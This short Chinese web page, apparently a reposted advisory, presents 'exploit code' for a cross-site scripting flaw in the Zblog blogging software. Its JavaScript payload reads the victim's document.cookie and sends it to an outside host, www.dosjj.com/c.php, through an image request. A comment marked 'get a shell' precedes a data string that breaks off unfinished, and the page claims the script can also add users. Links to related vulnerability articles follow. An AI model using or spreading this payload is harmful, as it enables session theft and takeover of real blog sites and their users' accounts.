Zblog最新跨站漏洞及利用代码
摘要:Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向xmlhttp=poster();cookie=document.co...
Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf(‘password’)==-1?0:1;
tolocation=’/’;
//get cookie
x=new Image();
x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);
//get a shell
data=”txaContent=
【Zblog最新跨站漏洞及利用代码】相关文章:
★ IBM Rational ClearQuest 跨站脚本漏洞
上一篇:
金山毒霸多个sql注入及XSS漏洞和修复